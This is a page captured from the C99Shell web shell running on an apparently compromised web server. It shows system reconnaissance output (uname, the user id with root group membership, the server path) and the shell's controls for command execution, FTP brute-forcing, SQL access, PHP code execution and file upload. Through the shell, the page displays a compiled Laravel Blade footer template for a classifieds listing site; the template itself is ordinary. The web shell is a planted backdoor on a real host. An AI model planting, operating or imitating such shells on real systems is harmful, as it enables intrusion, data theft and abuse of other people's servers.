!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 28.2 GB of 117.98 GB (23.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     4c6243c64235ba3c40c7cab515d9c693.php (20.36 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<footer
    class="bg-gray-50 dark:bg-black border-t border-gray-100 dark:border-gray-400">
    <div class="container py-16">
        <div class="flex flex-wrap gap-6 items-start">
            <div class="widget max-w-[424px] flex-grow">
                <a href="/" class="mb-4 inline-flex">
                    <img id="logo" src="<?php echo e(asset($setting->logo_image)); ?>" alt="">
                </a>
                <p class="mb-4 body-md-400 text-gray-700 dark:text-white max-w-[372px]">
                    <?php echo e(__('adlisting_is_a_trusted_directory_listing_companyrelied_upon_by_millions_of_people')); ?></p>
                <a href="<?php echo e(route('frontend.priceplan')); ?>" class="btn-primary">
                    <span><?php echo e(__('get_membership')); ?></span>
                </a>
            </div>
            <div class="widget flex-grow">
                <h3 class="widget-title heading-06 text-gray-900 dark:text-white mb-3.5"><?php echo e(__('quick_links')); ?></h3>
                <ul class="flex flex-col gap-3.5">
                    <li><a href="<?php echo e(route('frontend.ads')); ?>" class="footer-link dark:text-gray-100 heading-07 capitalize"><?php echo e(__('listing')); ?></a></li>
                    <li><a href="<?php echo e(route('frontend.promotions')); ?>" class="footer-link dark:text-gray-100 heading-07 capitalize"><?php echo e(__('promotions')); ?></a></li>
                    <li><a href="<?php echo e(route('frontend.about')); ?>" class="footer-link dark:text-gray-100 heading-07"><?php echo e(__('about_us')); ?></a>
                    </li>
                    <li><a href="<?php echo e(route('frontend.blog')); ?>" class="footer-link dark:text-gray-100 heading-07">
                            <?php echo e(__('blog')); ?></a>
                    </li>
                    <li><a href="<?php echo e(route('frontend.priceplan')); ?>"
                            class="footer-link dark:text-gray-100 heading-07"><?php echo e(__('pricing_plan')); ?></a></li>
                </ul>
            </div>
            <div class="widget flex-grow">
                <h3 class="widget-title heading-06 text-gray-900 dark:text-white mb-3.5"><?php echo e(__('supports')); ?></h3>
                <ul class="flex flex-col gap-3.5">
                    <li><a href="<?php echo e(route('frontend.contact')); ?>"
                            class="footer-link dark:text-gray-100 heading-07"><?php echo e(__('contact')); ?></a></li>
                    <li><a href="<?php echo e(route('frontend.faq')); ?>"
                            class="footer-link dark:text-gray-100 heading-07"><?php echo e(__('faqs')); ?></a>
                    </li>
                    <li><a href="<?php echo e(route('frontend.terms')); ?>"
                            class="footer-link dark:text-gray-100 heading-07"><?php echo e(__('terms_condition')); ?></a>
                    </li>
                    <li><a href="<?php echo e(route('frontend.privacy')); ?>"
                            class="footer-link dark:text-gray-100 heading-07"><?php echo e(__('privacy_policy')); ?></a></li>
                    <li><a href="<?php echo e(route('frontend.refund')); ?>"
                            class="footer-link dark:text-gray-100 heading-07"><?php echo e(__('refund_policy')); ?></a></li>
                </ul>
            </div>
            <div class="widget flex-grow">
                <?php if($mobile_setting->ios_download_url || $mobile_setting->android_download_url): ?>
                    <h3 class="widget-title mb-3 caption-03 text-gray-900 dark:text-white"><?php echo e(__('download_our_app')); ?>

                    </h3>
                    <div class="flex flex-wrap gap-3 items-center mb-6">

                        <?php if($mobile_setting->ios_download_url): ?>
                            <a target="_blank" href="<?php echo e(asset($mobile_setting->ios_download_url)); ?>"
                                class="app-store-btn dark:text-white inline-flex gap-3 items-center py-3 px-4 rounded-lg shadow-[0px_4px_6px_-2px_rgba(28,33,38,0.03)] bg-white dark:bg-gray-700">
                                <?php if (isset($component)) { $__componentOriginalf23699da9056a56aa8f2213da0f28b01 $component; } ?>
<?php 
if (isset($attributes)) { $__attributesOriginalf23699da9056a56aa8f2213da0f28b01 $attributes; } ?>
<?php $component 
Illuminate\View\AnonymousComponent::resolve(['view' => 'components.svg.apple-icon','data' => []] + (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag ? (array) $attributes->getIterator() : [])); ?>
<?php $component
->withName('svg.apple-icon'); ?>
<?php 
if ($component->shouldRender()): ?>
<?php $__env
->startComponent($component->resolveView(), $component->data()); ?>
<?php 
if (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag && $constructor = (new ReflectionClass(Illuminate\View\AnonymousComponent::class))->getConstructor()): ?>
<?php $attributes 
$attributes->except(collect($constructor->getParameters())->map->getName()->all()); ?>
<?php 
endif; ?>
<?php $component
->withAttributes([]); ?>
<?php 
echo $__env->renderComponent(); ?>
<?php 
endif; ?>
<?php 
if (isset($__attributesOriginalf23699da9056a56aa8f2213da0f28b01)): ?>
<?php $attributes 
$__attributesOriginalf23699da9056a56aa8f2213da0f28b01?>
<?php 
unset($__attributesOriginalf23699da9056a56aa8f2213da0f28b01); ?>
<?php 
endif; ?>
<?php 
if (isset($__componentOriginalf23699da9056a56aa8f2213da0f28b01)): ?>
<?php $component 
$__componentOriginalf23699da9056a56aa8f2213da0f28b01?>
<?php 
unset($__componentOriginalf23699da9056a56aa8f2213da0f28b01); ?>
<?php 
endif; ?>
                                <div>
                                    <p class="body-xs-500 text-gray-500 dark:text-gray-300"><?php echo e(__('get_it_now')); ?></p>
                                    <p class="body-md-500 text-gray-900 dark:text-white"><?php echo e(__('app_store')); ?></p>
                                </div>
                            </a>
                        <?php endif; ?>

                        <?php if($mobile_setting->android_download_url): ?>
                            <a target="_blank" href="<?php echo e(asset($mobile_setting->android_download_url)); ?>"
                                class="app-store-btn dark:text-white inline-flex gap-3 items-center py-3 px-4 rounded-lg shadow-[0px_4px_6px_-2px_rgba(28,33,38,0.03)] bg-white dark:bg-gray-700">
                                <?php if (isset($component)) { $__componentOriginal3b215c6b8fb91ffedb4dbed9de7e8f8b $component; } ?>
<?php 
if (isset($attributes)) { $__attributesOriginal3b215c6b8fb91ffedb4dbed9de7e8f8b $attributes; } ?>
<?php $component 
Illuminate\View\AnonymousComponent::resolve(['view' => 'components.svg.google-play-icon','data' => []] + (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag ? (array) $attributes->getIterator() : [])); ?>
<?php $component
->withName('svg.google-play-icon'); ?>
<?php 
if ($component->shouldRender()): ?>
<?php $__env
->startComponent($component->resolveView(), $component->data()); ?>
<?php 
if (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag && $constructor = (new ReflectionClass(Illuminate\View\AnonymousComponent::class))->getConstructor()): ?>
<?php $attributes 
$attributes->except(collect($constructor->getParameters())->map->getName()->all()); ?>
<?php 
endif; ?>
<?php $component
->withAttributes([]); ?>
<?php 
echo $__env->renderComponent(); ?>
<?php 
endif; ?>
<?php 
if (isset($__attributesOriginal3b215c6b8fb91ffedb4dbed9de7e8f8b)): ?>
<?php $attributes 
$__attributesOriginal3b215c6b8fb91ffedb4dbed9de7e8f8b?>
<?php 
unset($__attributesOriginal3b215c6b8fb91ffedb4dbed9de7e8f8b); ?>
<?php 
endif; ?>
<?php 
if (isset($__componentOriginal3b215c6b8fb91ffedb4dbed9de7e8f8b)): ?>
<?php $component 
$__componentOriginal3b215c6b8fb91ffedb4dbed9de7e8f8b?>
<?php 
unset($__componentOriginal3b215c6b8fb91ffedb4dbed9de7e8f8b); ?>
<?php 
endif; ?>
                                <div>
                                    <p class="body-xs-500 text-gray-500 dark:text-gray-300"><?php echo e(__('get_it_now')); ?></p>
                                    <p class="body-md-500 text-gray-900 dark:text-white"><?php echo e(__('google_play')); ?></p>
                                </div>
                            </a>
                        <?php endif; ?>

                    </div>
                <?php endif; ?>

                <ul class="footer-social flex gap-2.5 items-center">
                    <?php if($setting->facebook): ?>
                        <li>
                            <a target="_blank" href="<?php echo e($setting->facebook); ?>"
                                class="w-10 h-10 rounded-full inline-flex justify-center items-center bg-white">
                                <?php if (isset($component)) { $__componentOriginaladf8d905a87cf139c4f14915e1eb2834 $component; } ?>
<?php 
if (isset($attributes)) { $__attributesOriginaladf8d905a87cf139c4f14915e1eb2834 $attributes; } ?>
<?php $component 
App\View\Components\Svg\FacebookIcon::resolve(['fill' => '#555B61'] + (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag ? (array) $attributes->getIterator() : [])); ?>
<?php $component
->withName('svg.facebook-icon'); ?>
<?php 
if ($component->shouldRender()): ?>
<?php $__env
->startComponent($component->resolveView(), $component->data()); ?>
<?php 
if (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag && $constructor = (new ReflectionClass(App\View\Components\Svg\FacebookIcon::class))->getConstructor()): ?>
<?php $attributes 
$attributes->except(collect($constructor->getParameters())->map->getName()->all()); ?>
<?php 
endif; ?>
<?php $component
->withAttributes([]); ?>
<?php 
echo $__env->renderComponent(); ?>
<?php 
endif; ?>
<?php 
if (isset($__attributesOriginaladf8d905a87cf139c4f14915e1eb2834)): ?>
<?php $attributes 
$__attributesOriginaladf8d905a87cf139c4f14915e1eb2834?>
<?php 
unset($__attributesOriginaladf8d905a87cf139c4f14915e1eb2834); ?>
<?php 
endif; ?>
<?php 
if (isset($__componentOriginaladf8d905a87cf139c4f14915e1eb2834)): ?>
<?php $component 
$__componentOriginaladf8d905a87cf139c4f14915e1eb2834?>
<?php 
unset($__componentOriginaladf8d905a87cf139c4f14915e1eb2834); ?>
<?php 
endif; ?>
                            </a>
                        </li>
                    <?php endif; ?>
                    <?php if($setting->twitter): ?>
                        <li>
                            <a target="_blank" href="<?php echo e($setting->twitter); ?>"
                                class="w-10 h-10 rounded-full inline-flex justify-center items-center bg-white">
                                <?php if (isset($component)) { $__componentOriginalfd96a379163ede1ee9cee0a002b923b3 $component; } ?>
<?php 
if (isset($attributes)) { $__attributesOriginalfd96a379163ede1ee9cee0a002b923b3 $attributes; } ?>
<?php $component 
App\View\Components\Svg\TwitterIcon::resolve(['fill' => '#555B61'] + (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag ? (array) $attributes->getIterator() : [])); ?>
<?php $component
->withName('svg.twitter-icon'); ?>
<?php 
if ($component->shouldRender()): ?>
<?php $__env
->startComponent($component->resolveView(), $component->data()); ?>
<?php 
if (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag && $constructor = (new ReflectionClass(App\View\Components\Svg\TwitterIcon::class))->getConstructor()): ?>
<?php $attributes 
$attributes->except(collect($constructor->getParameters())->map->getName()->all()); ?>
<?php 
endif; ?>
<?php $component
->withAttributes([]); ?>
<?php 
echo $__env->renderComponent(); ?>
<?php 
endif; ?>
<?php 
if (isset($__attributesOriginalfd96a379163ede1ee9cee0a002b923b3)): ?>
<?php $attributes 
$__attributesOriginalfd96a379163ede1ee9cee0a002b923b3?>
<?php 
unset($__attributesOriginalfd96a379163ede1ee9cee0a002b923b3); ?>
<?php 
endif; ?>
<?php 
if (isset($__componentOriginalfd96a379163ede1ee9cee0a002b923b3)): ?>
<?php $component 
$__componentOriginalfd96a379163ede1ee9cee0a002b923b3?>
<?php 
unset($__componentOriginalfd96a379163ede1ee9cee0a002b923b3); ?>
<?php 
endif; ?>
                            </a>
                        </li>
                    <?php endif; ?>
                    <?php if($setting->instagram): ?>
                        <li>
                            <a target="_blank" href="<?php echo e($setting->instagram); ?>"
                                class="w-10 h-10 rounded-full inline-flex justify-center items-center bg-white">
                                <?php if (isset($component)) { $__componentOriginaldb016909c83eb754379ec85bd3008ece $component; } ?>
<?php 
if (isset($attributes)) { $__attributesOriginaldb016909c83eb754379ec85bd3008ece $attributes; } ?>
<?php $component 
Illuminate\View\AnonymousComponent::resolve(['view' => 'components.svg.instagram-icon','data' => ['fill' => '#555B61']] + (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag ? (array) $attributes->getIterator() : [])); ?>
<?php $component
->withName('svg.instagram-icon'); ?>
<?php 
if ($component->shouldRender()): ?>
<?php $__env
->startComponent($component->resolveView(), $component->data()); ?>
<?php 
if (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag && $constructor = (new ReflectionClass(Illuminate\View\AnonymousComponent::class))->getConstructor()): ?>
<?php $attributes 
$attributes->except(collect($constructor->getParameters())->map->getName()->all()); ?>
<?php 
endif; ?>
<?php $component
->withAttributes(['fill' => '#555B61']); ?>
<?php 
echo $__env->renderComponent(); ?>
<?php 
endif; ?>
<?php 
if (isset($__attributesOriginaldb016909c83eb754379ec85bd3008ece)): ?>
<?php $attributes 
$__attributesOriginaldb016909c83eb754379ec85bd3008ece?>
<?php 
unset($__attributesOriginaldb016909c83eb754379ec85bd3008ece); ?>
<?php 
endif; ?>
<?php 
if (isset($__componentOriginaldb016909c83eb754379ec85bd3008ece)): ?>
<?php $component 
$__componentOriginaldb016909c83eb754379ec85bd3008ece?>
<?php 
unset($__componentOriginaldb016909c83eb754379ec85bd3008ece); ?>
<?php 
endif; ?>
                            </a>
                        </li>
                    <?php endif; ?>
                    <?php if($setting->youtube): ?>
                        <li>
                            <a target="_blank" href="<?php echo e($setting->youtube); ?>"
                                class="w-10 h-10 rounded-full inline-flex justify-center items-center bg-white">
                                <?php if (isset($component)) { $__componentOriginalc88660e0598325ba9e69ba5d954422c0 $component; } ?>
<?php 
if (isset($attributes)) { $__attributesOriginalc88660e0598325ba9e69ba5d954422c0 $attributes; } ?>
<?php $component 
Illuminate\View\AnonymousComponent::resolve(['view' => 'components.svg.youtube-icon','data' => ['fill' => '#555B61']] + (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag ? (array) $attributes->getIterator() : [])); ?>
<?php $component
->withName('svg.youtube-icon'); ?>
<?php 
if ($component->shouldRender()): ?>
<?php $__env
->startComponent($component->resolveView(), $component->data()); ?>
<?php 
if (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag && $constructor = (new ReflectionClass(Illuminate\View\AnonymousComponent::class))->getConstructor()): ?>
<?php $attributes 
$attributes->except(collect($constructor->getParameters())->map->getName()->all()); ?>
<?php 
endif; ?>
<?php $component
->withAttributes(['fill' => '#555B61']); ?>
<?php 
echo $__env->renderComponent(); ?>
<?php 
endif; ?>
<?php 
if (isset($__attributesOriginalc88660e0598325ba9e69ba5d954422c0)): ?>
<?php $attributes 
$__attributesOriginalc88660e0598325ba9e69ba5d954422c0?>
<?php 
unset($__attributesOriginalc88660e0598325ba9e69ba5d954422c0); ?>
<?php 
endif; ?>
<?php 
if (isset($__componentOriginalc88660e0598325ba9e69ba5d954422c0)): ?>
<?php $component 
$__componentOriginalc88660e0598325ba9e69ba5d954422c0?>
<?php 
unset($__componentOriginalc88660e0598325ba9e69ba5d954422c0); ?>
<?php 
endif; ?>
                            </a>
                        </li>
                    <?php endif; ?>
                    <?php if($setting->linkdin): ?>
                        <li>
                            <a target="_blank" href="<?php echo e($setting->linkdin); ?>"
                                class="w-10 h-10 rounded-full inline-flex justify-center items-center bg-white">
                                <?php if (isset($component)) { $__componentOriginal12b43f7f7c39513567e6141a5b993d04 $component; } ?>
<?php 
if (isset($attributes)) { $__attributesOriginal12b43f7f7c39513567e6141a5b993d04 $attributes; } ?>
<?php $component 
App\View\Components\Svg\LinkedinIcon::resolve(['fill' => '#555B61'] + (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag ? (array) $attributes->getIterator() : [])); ?>
<?php $component
->withName('svg.linkedin-icon'); ?>
<?php 
if ($component->shouldRender()): ?>
<?php $__env
->startComponent($component->resolveView(), $component->data()); ?>
<?php 
if (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag && $constructor = (new ReflectionClass(App\View\Components\Svg\LinkedinIcon::class))->getConstructor()): ?>
<?php $attributes 
$attributes->except(collect($constructor->getParameters())->map->getName()->all()); ?>
<?php 
endif; ?>
<?php $component
->withAttributes([]); ?>
<?php 
echo $__env->renderComponent(); ?>
<?php 
endif; ?>
<?php 
if (isset($__attributesOriginal12b43f7f7c39513567e6141a5b993d04)): ?>
<?php $attributes 
$__attributesOriginal12b43f7f7c39513567e6141a5b993d04?>
<?php 
unset($__attributesOriginal12b43f7f7c39513567e6141a5b993d04); ?>
<?php 
endif; ?>
<?php 
if (isset($__componentOriginal12b43f7f7c39513567e6141a5b993d04)): ?>
<?php $component 
$__componentOriginal12b43f7f7c39513567e6141a5b993d04?>
<?php 
unset($__componentOriginal12b43f7f7c39513567e6141a5b993d04); ?>
<?php 
endif; ?>
                            </a>
                        </li>
                    <?php endif; ?>
                    <?php if($setting->whatsapp): ?>
                        <li>
                            <a target="_blank" href="<?php echo e($setting->whatsapp); ?>"
                                class="w-10 h-10 rounded-full inline-flex justify-center items-center bg-white">
                                <?php if (isset($component)) { $__componentOriginalc1a50ae9d99329e7d16af928a58af8ea $component; } ?>
<?php 
if (isset($attributes)) { $__attributesOriginalc1a50ae9d99329e7d16af928a58af8ea $attributes; } ?>
<?php $component 
Illuminate\View\AnonymousComponent::resolve(['view' => 'components.svg.whatsapp-icon','data' => ['fill' => '#555B61']] + (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag ? (array) $attributes->getIterator() : [])); ?>
<?php $component
->withName('svg.whatsapp-icon'); ?>
<?php 
if ($component->shouldRender()): ?>
<?php $__env
->startComponent($component->resolveView(), $component->data()); ?>
<?php 
if (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag && $constructor = (new ReflectionClass(Illuminate\View\AnonymousComponent::class))->getConstructor()): ?>
<?php $attributes 
$attributes->except(collect($constructor->getParameters())->map->getName()->all()); ?>
<?php 
endif; ?>
<?php $component
->withAttributes(['fill' => '#555B61']); ?>
<?php 
echo $__env->renderComponent(); ?>
<?php 
endif; ?>
<?php 
if (isset($__attributesOriginalc1a50ae9d99329e7d16af928a58af8ea)): ?>
<?php $attributes 
$__attributesOriginalc1a50ae9d99329e7d16af928a58af8ea?>
<?php 
unset($__attributesOriginalc1a50ae9d99329e7d16af928a58af8ea); ?>
<?php 
endif; ?>
<?php 
if (isset($__componentOriginalc1a50ae9d99329e7d16af928a58af8ea)): ?>
<?php $component 
$__componentOriginalc1a50ae9d99329e7d16af928a58af8ea?>
<?php 
unset($__componentOriginalc1a50ae9d99329e7d16af928a58af8ea); ?>
<?php 
endif; ?>
                            </a>
                        </li>
                    <?php endif; ?>
                </ul>
            </div>

        </div>
        <div class="mt-12">
            <p class="text-center body-md-400 text-gray-700 dark:text-gray-100">
                
          &copy; <?php echo e(date('Y')); ?> <strong><a href="<?php echo e(route('frontend.index')); ?>"><?php echo e(config('app.name')); ?></a></strong>. All rights reserved.

            </p>
        </div>
    </div>
</footer>
<?php /**PATH E:\add listing 8-9-25\addListing\resources\views/components/frontend/footer/footer.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0052 ]--